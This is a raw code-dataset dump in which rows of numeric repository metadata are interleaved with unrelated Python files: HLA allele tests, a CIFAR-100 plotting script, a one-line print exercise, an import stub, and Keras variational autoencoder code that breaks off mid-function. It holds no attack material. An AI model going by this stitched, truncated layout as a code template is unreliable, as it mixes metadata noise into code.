| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bec1de71110b57f69888dd52f597cfcfd2beb472
| 4,776
|
py
|
Python
|
test/test_allele.py
|
til-unc/mhcgnomes
|
0bfbe193daeb7cd38d958222f6071dd657e9fb6e
|
[
"Apache-2.0"
] | 6
|
2020-10-27T15:31:32.000Z
|
2020-11-29T03:26:06.000Z
|
test/test_allele.py
|
til-unc/mhcgnomes
|
0bfbe193daeb7cd38d958222f6071dd657e9fb6e
|
[
"Apache-2.0"
] | 4
|
2020-10-27T14:57:16.000Z
|
2020-11-04T21:56:39.000Z
|
test/test_allele.py
|
pirl-unc/mhcgnomes
|
0bfbe193daeb7cd38d958222f6071dd657e9fb6e
|
[
"Apache-2.0"
] | null | null | null |
from mhcgnomes import Allele
from nose.tools import eq_
def test_allele_get_A0201():
allele = Allele.get("HLA", "A", "02", "01")
assert allele is not None
assert type(allele) is Allele
eq_(allele.species_prefix, "HLA")
eq_(allele.gene_name, "A")
eq_(list(allele.allele_fields), ["02", "01"])
eq_(allele.mhc_class, "Ia")
def test_restrict_num_allele_fields_A02010101():
allele_eight_digit = Allele.get("HLA", "A", "02", "01", "01", "01")
assert allele_eight_digit is not None
assert type(allele_eight_digit) is Allele
eq_(allele_eight_digit.num_allele_fields, 4)
allele_four_digit = allele_eight_digit.restrict_allele_fields(2)
eq_(allele_four_digit.num_allele_fields, 2)
def test_no_annotations():
allele = Allele.get("HLA", "A", "02", "01", "01", "01")
assert not allele.annotation_null
assert not allele.annotation_cystosolic
assert not allele.annotation_aberrant_expression
assert not allele.annotation_secreted
assert not allele.annotation_pseudogene
assert not allele.annotation_questionable
assert not allele.annotation_low_expression
assert not allele.annotation_group
assert not allele.annotation_splice_variant
def test_annotation_null():
allele = Allele.get("HLA", "A", "02", "01", "01", "01", annotation="N")
assert allele.annotation_null
assert not allele.annotation_cystosolic
assert not allele.annotation_aberrant_expression
assert not allele.annotation_secreted
assert not allele.annotation_pseudogene
assert not allele.annotation_questionable
assert not allele.annotation_low_expression
assert not allele.annotation_group
assert not allele.annotation_splice_variant
def test_annotation_cytosolic():
allele = Allele.get("HLA", "A", "02", "01", "01", "01", annotation="C")
assert not allele.annotation_null
assert allele.annotation_cystosolic
assert not allele.annotation_aberrant_expression
assert not allele.annotation_secreted
assert not allele.annotation_pseudogene
assert not allele.annotation_questionable
assert not allele.annotation_low_expression
assert not allele.annotation_group
assert not allele.annotation_splice_variant
def test_annotation_secreted():
allele = Allele.get("HLA", "A", "02", "01", "01", "01", annotation="S")
assert not allele.annotation_null
assert not allele.annotation_cystosolic
assert not allele.annotation_aberrant_expression
assert allele.annotation_secreted
assert not allele.annotation_pseudogene
assert not allele.annotation_questionable
assert not allele.annotation_low_expression
assert not allele.annotation_group
assert not allele.annotation_splice_variant
def test_annotation_questionable():
allele = Allele.get("HLA", "A", "02", "01", "01", "01", annotation="Q")
assert not allele.annotation_null
assert not allele.annotation_cystosolic
assert not allele.annotation_aberrant_expression
assert not allele.annotation_secreted
assert not allele.annotation_pseudogene
assert allele.annotation_questionable
assert not allele.annotation_low_expression
assert not allele.annotation_group
assert not allele.annotation_splice_variant
def test_annotation_group():
allele = Allele.get("HLA", "A", "02", "01", "01", "01", annotation="G")
assert not allele.annotation_null
assert not allele.annotation_cystosolic
assert not allele.annotation_aberrant_expression
assert not allele.annotation_secreted
assert not allele.annotation_pseudogene
assert not allele.annotation_questionable
assert not allele.annotation_low_expression
assert allele.annotation_group
assert not allele.annotation_splice_variant
def test_annotation_splice_variant():
allele = Allele.get("HLA", "A", "02", "01", "01", "01", annotation="Sp")
assert not allele.annotation_null
assert not allele.annotation_cystosolic
assert not allele.annotation_aberrant_expression
assert not allele.annotation_secreted
assert not allele.annotation_pseudogene
assert not allele.annotation_questionable
assert not allele.annotation_low_expression
assert not allele.annotation_group
assert allele.annotation_splice_variant
def test_annotation_pseudogene():
allele = Allele.get("HLA", "A", "02", "01", "01", "01", annotation="Ps")
assert not allele.annotation_null
assert not allele.annotation_cystosolic
assert not allele.annotation_aberrant_expression
assert not allele.annotation_secreted
assert allele.annotation_pseudogene
assert not allele.annotation_questionable
assert not allele.annotation_low_expression
assert not allele.annotation_group
assert not allele.annotation_splice_variant
| 39.8
| 76
| 0.764657
| 607
| 4,776
| 5.766063
| 0.097199
| 0.329143
| 0.278571
| 0.464286
| 0.863429
| 0.863429
| 0.839143
| 0.819429
| 0.819429
| 0.804
| 0
| 0.02355
| 0.15536
| 4,776
| 119
| 77
| 40.134454
| 0.844075
| 0
| 0
| 0.619048
| 0
| 0
| 0.028266
| 0
| 0
| 0
| 0
| 0
| 0.72381
| 1
| 0.095238
| false
| 0
| 0.019048
| 0
| 0.114286
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
fe35a3b2938c3a9695a40ff8f464099558b920bb
| 15,070
|
py
|
Python
|
plot_cifar100.py
|
VamshiTeja/SMDL
|
0dda36df9d0f2f921f365cc644f61dd81798693c
|
[
"MIT"
] | 16
|
2019-06-05T05:18:56.000Z
|
2021-10-30T00:29:54.000Z
|
plot_cifar100.py
|
VamshiTeja/SMDL
|
0dda36df9d0f2f921f365cc644f61dd81798693c
|
[
"MIT"
] | 5
|
2020-01-13T10:49:58.000Z
|
2022-03-11T23:48:55.000Z
|
plot_cifar100.py
|
VamshiTeja/SMDL
|
0dda36df9d0f2f921f365cc644f61dd81798693c
|
[
"MIT"
] | 6
|
2019-06-06T15:40:05.000Z
|
2020-08-11T12:46:58.000Z
|
import numpy as np
import matplotlib.pyplot as plt
import sys, os
from lib.config import cfg
if sys.version_info[0] == 2:
import cPickle as pickle
else:
import pickle
def plot_accuracies(data, title='Accuracy Plot', plot_type='Accuracy', x_axis_label='Epochs',save_location=None, mode='Test'):
"""
This helper function can be used to plot(visualize) the accuracies saved using lib.utils.save_accuracies()
:return: None
"""
plt.tick_params(direction='out', length=6, width=2)
if(save_location==None):
save_location = './final_plots/cifar100/'
if not os.path.exists(save_location):
os.makedirs(save_location)
for (i,info) in enumerate(data):
with open(info[0], 'rb') as f:
acc = pickle.load(f)
_plot_indiv_accuracies(acc, color=info[2], label=info[1], plot_type=plot_type)
if(info[1]=='SGD'):
with open(info[3], 'rb') as f:
upper_limit = pickle.load(f)
with open(info[4], 'rb') as f:
lower_limit = pickle.load(f)
x = np.arange(1, len(acc) + 1)
if(plot_type=="Accuracy"):
lower_limit = 100-lower_limit
upper_limit = 100-upper_limit
plt.fill_between(x, lower_limit, upper_limit, color='lightskyblue')
size = 15
plt.legend(fontsize=size)
# if title is not None:
# plt.title(title)
plt.xlabel(x_axis_label,fontsize=size)
plt.grid(True, linestyle='--', axis='y')
# plt.xticks(np.arange(0, 101, step=20))
if plot_type == 'Accuracy':
plt.yticks(np.arange(0, 110, step=10))
if (mode == 'Test'):
plt.ylabel('Test Error',fontsize=size)
elif (mode == 'Train'):
plt.ylabel('Train Error',fontsize=size)
plt.ylim([35,70])
else:
# plt.yticks(np.arange(0, 2, step=0.5))
if (mode == 'Test'):
plt.ylabel('Test Loss',fontsize=size)
elif (mode == 'Train'):
plt.ylabel('Train Loss',fontsize=size)
plt.ylim([1,4])
plt.savefig(save_location + title.replace(' ', '_').replace('(', '_').replace(')', '_') + '.eps', format='eps')
plt.close()
def _plot_indiv_accuracies(accuracies, color='blue', label='', plot_type=None):
x = np.arange(1, len(accuracies) + 1)
if(plot_type=='Accuracy'):
accuracies = 100 - np.array(accuracies)
plt.plot(x, accuracies, color=color, label=label)
if __name__ == '__main__':
#
# for i in range(1, 61):
# try:
# test_data = [[
# '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_ResNet20_0211_152357/accuracies/test_acc_between_iteration_epoch_' + str(i) + '_accuracy.pkl',
# 'SGD', 'blue'],
# [
# '/home/vamshi/PycharmProjects/SMDL/output/cifar100_resnet32_submodcomb_refresh-5_epochs-60_0203_103925/accuracies/test_acc_between_iteration_epoch_' + str(i) + '_accuracy.pkl',
# 'Submodular Selection', 'green']
# ]
# plot_accuracies(test_data, title='CIFAR100 Epoch ' + str(i) + ' Test Accuracy', x_axis_label='# of iterations (x10)')
# except Exception as error:
# print ('Exception occured for index {}, {}'.format(i, error))
# # CIFAR - 100
# -------------------
test_data = [[
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_acc_mean_accuracy.pkl',
'SGD', 'blue', '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_acc_upper_limit_accuracy.pkl',
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_acc_lower_limit_accuracy.pkl'],
[
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_acc_round_0_accuracy.pkl',
'LOSS', 'darkviolet'],
[
'/home/vamshi/PycharmProjects/SMDL/final_Results/fix_SMDL_CIFAR_100_ResNet32_0215_182025/accuracies/test_acc_round_0_accuracy.pkl',
'SMDL', 'green']
]
plot_accuracies(test_data, title='CIFAR 100 Test Accuracy (Main)')
train_data = [[
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_acc_mean_accuracy.pkl',
'SGD', 'blue', '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_acc_upper_limit_accuracy.pkl',
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_acc_lower_limit_accuracy.pkl'],
[
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_acc_round_0_accuracy.pkl',
'LOSS', 'darkviolet'],
[
'/home/vamshi/PycharmProjects/SMDL/final_Results/fix_SMDL_CIFAR_100_ResNet32_0215_182025/accuracies/train_acc_round_0_accuracy.pkl',
'SMDL', 'green']
]
plot_accuracies(train_data, title='CIFAR 100 Train Accuracy (Main)')
test_loss_data = [[
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_loss_mean_accuracy.pkl',
'SGD', 'blue', '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_loss_upper_limit_accuracy.pkl',
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_loss_lower_limit_accuracy.pkl'],
[
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_loss_round_0_accuracy.pkl',
'LOSS', 'darkviolet'],
[
'/home/vamshi/PycharmProjects/SMDL/final_Results/fix_SMDL_CIFAR_100_ResNet32_0215_182025/accuracies/test_loss_round_0_accuracy.pkl',
'SMDL', 'green']
]
plot_accuracies(test_loss_data, title='CIFAR 100 Test Loss (Main)', plot_type='Loss')
train_loss_data = [[
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_loss_mean_accuracy.pkl',
'SGD', 'blue', '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_loss_upper_limit_accuracy.pkl',
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_loss_lower_limit_accuracy.pkl'],
[
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_loss_round_0_accuracy.pkl',
'LOSS', 'darkviolet'],
[
'/home/vamshi/PycharmProjects/SMDL/final_Results/fix_SMDL_CIFAR_100_ResNet32_0215_182025/accuracies/test_loss_round_0_accuracy.pkl',
'SMDL', 'green']
]
plot_accuracies(train_loss_data, title='CIFAR 100 Train Loss (Main)', plot_type='Loss')
############## ablations ###############
########## refresh rate ##############
test_data = [[
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_acc_mean_accuracy.pkl',
'Random Selection', 'blue', '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_acc_upper_limit_accuracy.pkl',
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_acc_lower_limit_accuracy.pkl'],
[
'/home/vamshi/PycharmProjects/SMDL/final_Results/fix_SMDL_CIFAR_100_ResNet32_0215_182025/accuracies/test_acc_round_0_accuracy.pkl',
'SMDL Refresh Rate-5', 'green'],
[
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR_100_ResNet32_Refresh10_0212_123549/accuracies/test_acc_round_0_accuracy.pkl',
'SMDL Refresh Rate-10', 'orange'],
[
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR_100_ResNet32_Refresh25_0212_123328/accuracies/test_acc_round_0_accuracy.pkl',
'SMDL Refresh Rate-25', 'm'],
[
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR100_ResNet32_refresh40_0221_223728/accuracies/test_acc_round_0_accuracy.pkl',
'SMDL Refresh Rate-40', 'black'],
# [
# '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR_100_ResNet32_Refresh50_0212_123140/accuracies/test_acc_round_0_accuracy.pkl',
# 'SMDL Refresh Rate-50', 'black']
]
plot_accuracies(test_data, title='CIFAR 100 Test Error with RF Ablation', save_location='./final_plots/cifar100/Refresh/')
train_data = [[
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_acc_mean_accuracy.pkl',
'Random Selection', 'blue', '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_acc_upper_limit_accuracy.pkl',
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_acc_lower_limit_accuracy.pkl'],
[
'/home/vamshi/PycharmProjects/SMDL/final_Results/fix_SMDL_CIFAR_100_ResNet32_0215_182025/accuracies/train_acc_round_0_accuracy.pkl',
'SMDL Refresh Rate-5', 'green'],
[
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR_100_ResNet32_Refresh10_0212_123549/accuracies/train_acc_round_0_accuracy.pkl',
'SMDL Refresh Rate-10', 'orange'],
[
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR_100_ResNet32_Refresh25_0212_123328/accuracies/train_acc_round_0_accuracy.pkl',
'SMDL Refresh Rate-25', 'm'],
[
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR100_ResNet32_refresh40_0221_223728/accuracies/train_acc_round_0_accuracy.pkl',
'SMDL Refresh Rate-40', 'black'],
# [
# '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR_100_ResNet32_Refresh50_0212_123140/accuracies/train_acc_round_0_accuracy.pkl',
# 'SMDL Refresh Rate-50', 'black']
]
plot_accuracies(train_data, title='CIFAR 100 Train Error with RF Ablation', save_location='./final_plots/cifar100/Refresh/')
test_loss_data = [[
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_loss_mean_accuracy.pkl',
'Random Selection', 'blue', '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_loss_upper_limit_accuracy.pkl',
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/test_loss_lower_limit_accuracy.pkl'],
[
'/home/vamshi/PycharmProjects/SMDL/final_Results/fix_SMDL_CIFAR_100_ResNet32_0215_182025/accuracies/test_loss_round_0_accuracy.pkl',
'SMDL Refresh Rate-5', 'green'],
[
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR_100_ResNet32_Refresh10_0212_123549/accuracies/test_loss_round_0_accuracy.pkl',
'SMDL Refresh Rate-10', 'orange'],
[
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR_100_ResNet32_Refresh25_0212_123328/accuracies/test_loss_round_0_accuracy.pkl',
'SMDL Refresh Rate-25', 'm'],
[
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR100_ResNet32_refresh40_0221_223728/accuracies/test_loss_round_0_accuracy.pkl',
'SMDL Refresh Rate-40', 'black'],
# [
# '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR_100_ResNet32_Refresh50_0212_123140/accuracies/test_loss_round_0_accuracy.pkl',
# 'SMDL Refresh Rate-50', 'black']
]
plot_accuracies(test_loss_data, title='CIFAR 100 Test Loss with RF Ablation', plot_type='Loss', save_location='./final_plots/cifar100/Refresh/')
train_loss_data = [[
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_loss_mean_accuracy.pkl',
'Random Selection', 'blue', '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_loss_upper_limit_accuracy.pkl',
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SGD_CIFAR_100_ResNet32_0211_152526/accuracies/train_loss_lower_limit_accuracy.pkl'],
[
'/home/vamshi/PycharmProjects/SMDL/final_Results/fix_SMDL_CIFAR_100_ResNet32_0215_182025/accuracies/test_loss_round_0_accuracy.pkl',
'SMDL Refresh Rate-5', 'green'],
[
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR_100_ResNet32_Refresh10_0212_123549/accuracies/test_loss_round_0_accuracy.pkl',
'SMDL Refresh Rate-10', 'orange'],
[
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR_100_ResNet32_Refresh25_0212_123328/accuracies/test_loss_round_0_accuracy.pkl',
'SMDL Refresh Rate-25', 'm'],
[
'/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR100_ResNet32_refresh40_0221_223728/accuracies/test_loss_round_0_accuracy.pkl',
'SMDL Refresh Rate-40', 'black'],
# [
# '/home/vamshi/PycharmProjects/SMDL/final_Results/final_SMDL_CIFAR_100_ResNet32_Refresh50_0212_123140/accuracies/test_loss_round_0_accuracy.pkl',
# 'SMDL Refresh Rate-50', 'black']
]
plot_accuracies(train_loss_data, title='CIFAR 100 Train Loss with RF Ablation', plot_type='Loss', save_location='./final_plots/cifar100/Refresh/')
| 62.272727
| 212
| 0.656271
| 1,761
| 15,070
| 5.220329
| 0.105622
| 0.049603
| 0.146851
| 0.170347
| 0.840748
| 0.823126
| 0.814642
| 0.814642
| 0.792886
| 0.787773
| 0
| 0.087013
| 0.235103
| 15,070
| 242
| 213
| 62.272727
| 0.710506
| 0.125614
| 0
| 0.404624
| 0
| 0
| 0.578903
| 0.500344
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011561
| false
| 0
| 0.034682
| 0
| 0.046243
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fe48b296946247e97ad2d31e5a4afeb53cac385b
| 30
|
py
|
Python
|
Chapter 04/ch41k.py
|
bpbpublications/TEST-YOUR-SKILLS-IN-PYTHON-LANGUAGE
|
f6a4194684515495d00aa38347a725dd08f39a0c
|
[
"MIT"
] | null | null | null |
Chapter 04/ch41k.py
|
bpbpublications/TEST-YOUR-SKILLS-IN-PYTHON-LANGUAGE
|
f6a4194684515495d00aa38347a725dd08f39a0c
|
[
"MIT"
] | null | null | null |
Chapter 04/ch41k.py
|
bpbpublications/TEST-YOUR-SKILLS-IN-PYTHON-LANGUAGE
|
f6a4194684515495d00aa38347a725dd08f39a0c
|
[
"MIT"
] | null | null | null |
print(2+3 * 5 & 7**2)
#17
| 10
| 24
| 0.4
| 7
| 30
| 1.714286
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.35
| 0.333333
| 30
| 3
| 25
| 10
| 0.25
| 0.066667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
fe6c73aab9a5655789293d99cf2998fe3fd967db
| 111
|
py
|
Python
|
dizoo/procgen/maze/entry/__init__.py
|
sailxjx/DI-engine
|
c6763f8e2ba885a2a02f611195a1b5f8b50bff00
|
[
"Apache-2.0"
] | 464
|
2021-07-08T07:26:33.000Z
|
2022-03-31T12:35:16.000Z
|
dizoo/procgen/maze/entry/__init__.py
|
sailxjx/DI-engine
|
c6763f8e2ba885a2a02f611195a1b5f8b50bff00
|
[
"Apache-2.0"
] | 177
|
2021-07-09T08:22:55.000Z
|
2022-03-31T07:35:22.000Z
|
dizoo/procgen/maze/entry/__init__.py
|
sailxjx/DI-engine
|
c6763f8e2ba885a2a02f611195a1b5f8b50bff00
|
[
"Apache-2.0"
] | 92
|
2021-07-08T12:16:37.000Z
|
2022-03-31T09:24:41.000Z
|
from .maze_ppo_config import main_config, create_config
from .maze_dqn_config import main_config, create_config
| 55.5
| 55
| 0.882883
| 18
| 111
| 5
| 0.444444
| 0.177778
| 0.355556
| 0.488889
| 0.755556
| 0.755556
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081081
| 111
| 2
| 56
| 55.5
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
fe980797b792f640d2f480a499ac62e42f8e8dbb
| 11,680
|
py
|
Python
|
supervised_BAE.py
|
bolopenguin/SSb-VAE-Custom
|
ad5484e9d3d0e57fc632c365fdb4847bf64ee457
|
[
"Apache-2.0"
] | null | null | null |
supervised_BAE.py
|
bolopenguin/SSb-VAE-Custom
|
ad5484e9d3d0e57fc632c365fdb4847bf64ee457
|
[
"Apache-2.0"
] | null | null | null |
supervised_BAE.py
|
bolopenguin/SSb-VAE-Custom
|
ad5484e9d3d0e57fc632c365fdb4847bf64ee457
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import keras
from keras.layers import *
from keras.models import Sequential,Model
from keras import backend as K
from base_networks import *
import tensorflow as tf
def my_KL_loss(y_true, y_pred):
y_pred = K.clip(y_pred, K.epsilon(), 1)
return - K.sum(y_true*K.log(y_pred), axis=-1)
def my_binary_KL_loss(y_true, y_pred):
y_pred = K.clip(y_pred, K.epsilon(), 1)
compl_y_pred = 1.0 - y_pred
compl_y_pred = K.clip(compl_y_pred, K.epsilon(), 1)
return - K.sum(y_true*K.log(y_pred) + (1-y_true)*K.log(compl_y_pred), axis=-1)
def my_binary_KL_loss_stable(y_true, y_pred):
y_pred = K.clip(y_pred, K.epsilon(), 1-K.epsilon())
logits = K.log(y_pred) - K.log(1-y_pred) # sigmoid inverse
neg_abs_logits = -K.abs(logits)
relu_logits = K.relu(logits)
loss_vec = relu_logits - logits*y_true + K.log(1 + K.exp(neg_abs_logits))
return K.sum(loss_vec)
def REC_loss(x_true, x_pred):
x_pred = K.clip(x_pred, K.epsilon(), 1)
return - K.sum(x_true*K.log(x_pred), axis=-1) #keras.losses.categorical_crossentropy(x_true, x_pred)
def traditional_VAE(data_dim,Nb,units,layers_e,layers_d,opt='adam',BN=True, summ=True, beta=0):
pre_encoder = define_pre_encoder(data_dim, layers=layers_e,units=units,BN=BN)
if summ:
print("pre-encoder network:")
pre_encoder.summary()
generator = define_generator(Nb,data_dim,layers=layers_d,units=units,BN=BN)
if summ:
print("generator network:")
generator.summary()
## Encoder
x = Input(shape=(data_dim,))
hidden = pre_encoder(x)
z_mean = Dense(Nb,activation='linear', name='z-mean')(hidden)
z_log_var = Dense(Nb,activation='linear',name = 'z-log_var')(hidden)
encoder = Model(x, z_mean) # build a model to project inputs on the latent space
def sampling(args):
epsilon_std = 1.0
z_mean, z_log_var = args
epsilon = K.random_normal(shape=(K.shape(z_mean)[0], Nb),mean=0., stddev=epsilon_std)
return z_mean + K.exp(0.5*z_log_var) * epsilon #+sigma (desvest)
## Decoder
z_sampled = Lambda(sampling, output_shape=(Nb,), name='sampled')([z_mean, z_log_var])
output = generator(z_sampled)
Recon_loss = REC_loss
kl_loss = KL_loss(z_mean,z_log_var)
def VAE_loss(y_true, y_pred):
return Recon_loss(y_true, y_pred) + beta*kl_loss(y_true, y_pred)
traditional_vae = Model(x, output)
traditional_vae.compile(optimizer=opt, loss=VAE_loss, metrics = [Recon_loss,kl_loss])
return traditional_vae, encoder,generator
def sample_gumbel(shape,eps=K.epsilon()):
"""Inverse Sample function from Gumbel(0, 1)"""
U = K.random_uniform(shape, 0, 1)
return K.log(U + eps)- K.log(1-U + eps)
def VDSHS(data_dim,n_classes,Nb,units,layers_e,layers_d,opt='adam',BN=True, summ=True,tau_ann=False,beta=0,alpha=1.0,multilabel=False):
pre_encoder = define_pre_encoder(data_dim, layers=layers_e,units=units,BN=BN)
if summ:
print("pre-encoder network:")
pre_encoder.summary()
generator = define_generator(Nb,data_dim,layers=layers_d,units=units,BN=BN)
if summ:
print("generator network:")
generator.summary()
## Encoder
x = Input(shape=(data_dim,))
hidden = pre_encoder(x)
z_mean = Dense(Nb,activation='linear', name='z-mean')(hidden)
z_log_var = Dense(Nb,activation='linear',name = 'z-log_var')(hidden)
encoder = Model(x, z_mean) # build a model to project inputs on the latent space
def sampling(args):
epsilon_std = 1.0
z_mean, z_log_var = args
epsilon = K.random_normal(shape=(K.shape(z_mean)[0], Nb),mean=0., stddev=epsilon_std)
return z_mean + K.exp(0.5*z_log_var) * epsilon #+sigma (desvest)
## Decoder
z_sampled = Lambda(sampling, output_shape=(Nb,), name='sampled')([z_mean, z_log_var])
output = generator(z_sampled)
Recon_loss = REC_loss
kl_loss = KL_loss(z_mean,z_log_var)
def VAE_loss(y_true, y_pred):
return Recon_loss(y_true, y_pred) + beta*kl_loss(y_true, y_pred)
if multilabel:
supervised_layer = Dense(n_classes, activation='sigmoid',name='sup-class')(z_sampled)#req n_classes
else:
supervised_layer = Dense(n_classes, activation='softmax',name='sup-class')(z_sampled)#req n_classes
traditional_vae = Model(inputs=x, outputs=[output,supervised_layer])
if multilabel:
traditional_vae.compile(optimizer=opt, loss=[VAE_loss,my_binary_KL_loss],loss_weights=[1., alpha], metrics=[Recon_loss,kl_loss])
else:
traditional_vae.compile(optimizer=opt, loss=[VAE_loss,my_KL_loss],loss_weights=[1., alpha], metrics=[Recon_loss,kl_loss])
return traditional_vae, encoder,generator
def binary_VAE(data_dim,Nb,units,layers_e,layers_d,opt='adam',BN=True, summ=True,tau_ann=False,beta=0):
if tau_ann:
tau = K.variable(1.0, name="temperature")
else:
tau = K.variable(0.67, name="temperature") #o tau fijo en 0.67=2/3
pre_encoder = define_pre_encoder(data_dim, layers=layers_e,units=units,BN=BN)
if summ:
print("pre-encoder network:")
pre_encoder.summary()
generator = define_generator(Nb,data_dim,layers=layers_d,units=units,BN=BN)
if summ:
print("generator network:")
generator.summary()
x = Input(shape=(data_dim,))
hidden = pre_encoder(x)
logits_b = Dense(Nb, activation='linear', name='logits-b')(hidden) #log(B_j/1-B_j)
#proba = np.exp(logits_b)/(1+np.exp(logits_b)) = sigmoidal(logits_b) <<<<<<<<<< recupera probabilidad
#dist = Dense(Nb, activation='sigmoid')(hidden) #p(b) #otra forma de modelarlo
encoder = Model(x, logits_b)
def sampling(logits_b):
#logits_b = K.log(aux/(1-aux) + K.epsilon() )
b = logits_b + sample_gumbel(K.shape(logits_b)) # logits + gumbel noise
return keras.activations.sigmoid( b/tau )
b_sampled = Lambda(sampling, output_shape=(Nb,), name='sampled')(logits_b)
output = generator(b_sampled)
Recon_loss = REC_loss
kl_loss = BKL_loss(logits_b)
def BVAE_loss(y_true, y_pred):
return Recon_loss(y_true, y_pred) + beta*kl_loss(y_true, y_pred)
binary_vae = Model(x, output)
